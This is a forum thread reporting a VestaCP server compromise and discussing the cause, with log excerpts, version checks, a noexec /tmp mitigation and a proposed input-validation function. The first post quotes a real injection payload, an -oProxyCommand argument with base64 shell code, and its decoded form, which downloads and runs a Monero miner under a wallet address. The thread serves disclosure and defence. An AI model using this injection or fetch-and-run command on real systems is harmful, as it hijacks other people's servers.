[CLOSED] [Urgent!] Critical Security issue in VestaCP
Hi,
We have discovered what seems to be a security issue in VestaCP. This is what we have seen until now:
Attackers upload a file in /tmp for mining: /tmp/xmrig
We have seen this in the vesta error log:
2018-06-23 01:01:40 v-add-backup-host 'sftp' 'xx' '"-oProxyCommand=echo Y2QgL3RtcDtwa2lsbCB4bXItc3Rhaztwa2lsbCB4bXJpZztybSAtZiB4bXJpZyB4bXItc3RhayBjcHUudHh0IHBvb2xzLnR
4dCBjb25maWcudHh0O3dnZXQgLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAtcU8geG1yaWcgaHR0cHM6Ly90cmFuc2Zlci5zaC9leXo0ei94bXJpZyYmY2htb2QgK3ggeG1yaWcmJi4veG1yaWcgLS1hbGdvPWNyeXB0b25pZ2h
0IC0tdXJsPXBvb2wubWluZXhtci5jb206ODAgLS11c2VyPTQyeTFRRkJEU1ZtWFpidlpaOTVDTnBQb01kZExTNGRSUGRtaDlXZ0NSM3ZFNUQxYjJYcUdTVjVLb0JIdVBGU3VBalM3WXI3dHA0OGY5QU1WTFh1Z0R1VU1GbXA
2dWdkIC0tdGhyZWFkPSQoZ3JlcCBwcm9jZXNzb3IgL3Byb2MvY3B1aW5mb3x3YyAtbCkgLS1kb25hdGUtbGV2ZWw9MSAtLWJhY2tncm91bmQgPC9kZXYvbnVsbCAyPiYxID4vZGV2L251bGwK|base64 -d|sh" x' '****
**' [Error 15]
This is what this does:
cd /tmp;pkill xmr-stak;pkill xmrig;rm -f xmrig xmr-stak cpu.txt pools.txt config.txt;wget --no-check-certificate -qO xmrig https://transfer.sh/rysmn/xmrig&&chmod +x xmrig&&./xmrig --algo=cryptonight --url=pool.minexmr.com:80 --user=42y1QFBDSVmXZbvZZ95CNpPoMddLS4dRPdmh9WgCR3vE5D1b2XqGSV5KoBHuPFSuAjS7Yr7tp48f9AMVLXugDuUMFmp6ugd --thread=$(grep processor /proc/cpuinfo|wc -l) --donate-level=1 --background </dev/null 2>&1 >/dev/null
We think this can be mitigated by mounting /tmp with noexec by doing this:
tmpfs /tmp tmpfs rw,nodev,nosuid,noexec 0 0
in an LXC container.
We think this is important and developers should have a look asap!
Last edited by jcerdan on Mon Jun 25, 2018 7:36 am, edited 2 times in total.
Re: Critical Security issue in VestaCP
Hi,
We have found this on /var/log/vesta/nginx-access.log
192.99.151.112 - - [23/Jun/2018:01:01:39 +0200] POST /api/index.php HTTP/1.1 "499" 0 "-" "curl/7.60.0" "-"
Regards,
Re: Critical Security issue in VestaCP
Hi,
More info: Vesta was up to date:
# dpkg -l | grep vesta
ii vesta 0.9.8-21 amd64 Vesta
ii vesta-ioncube 0.9.8-21 amd64 ionCube Loader for Vesta
ii vesta-nginx 0.9.8-21 amd64 Vesta Nginx
ii vesta-php 0.9.8-21 amd64 Vesta php-fpm
ii vesta-softaculous 0.9.8-21 amd64 softaculous plugin for Vesta
Regards
Re: Critical Security issue in VestaCP
Hi,
I have checked v-add-backup-host. I think is_user_format_valid() should be added to the section 'Verifications'.
Please, this is important. If someone at VestaCP could have a look.
Regards.
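As an added example (not VestaCP's own code), here is a POSIX sh check of the kind this post proposes: the host argument of v-add-backup-host is later handed to sftp/ssh, so a value that begins with a dash is read by ssh as an option such as -oProxyCommand, and any shell metacharacter is a risk once the value is interpolated into a command line. The function name is_backup_host_valid is hypothetical.

```shell
#!/bin/sh
# Validate the sftp/ssh host before v-add-backup-host builds any command line
# with it. Returns 0 for an acceptable hostname or IPv4 address, 1 otherwise.
# (Hypothetical helper for illustration; VestaCP's validators live in the
# 'Verifications' section of its scripts, e.g. is_user_format_valid.)
is_backup_host_valid() {
    host="$1"
    # Empty values and anything starting with '-' would be parsed by ssh as an
    # option (this is how "-oProxyCommand=..." reached a shell in the log above).
    case "$host" in
        ""|-*) return 1 ;;
    esac
    # Allow only hostname/IPv4 characters: letters, digits, dot and hyphen.
    # This also rejects quotes, spaces, ';', '|', '&', '$' and '`'.
    case "$host" in
        *[!A-Za-z0-9.-]*) return 1 ;;
    esac
    # No empty labels: no leading, trailing or doubled dots.
    case "$host" in
        .*|*.|*..*) return 1 ;;
    esac
    return 0
}

# Usage inside a script: refuse the request before touching ssh/sftp.
# is_backup_host_valid "$HOST" || { echo "Error: host $HOST is not valid"; exit 1; }
```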
Re: [Urgent!] Critical Security issue in VestaCP
When exactly that server is installed?
Check creation date of /root/vst_install_backups folder.
Re: [Urgent!] Critical Security issue in VestaCP
Hi,
drwxr-xr-x 3 root root 4096 Apr 5 2017 vst_install_backups
Regards
Re: [Urgent!] Critical Security issue in VestaCP
Can you send us nginx-access.log to dev _at_ vestacp.com ?
Also, it would be nice if you could send /var/log/apache2/domains/YOUR-HOSTNAME.log (apache2 or httpd folder, depending on distribution).
Re: [Urgent!] Critical Security issue in VestaCP
Hi,
I have just sent 3 logs:
vesta nginx-access.log
vesta nginx-error.log
apache <host> log
Regards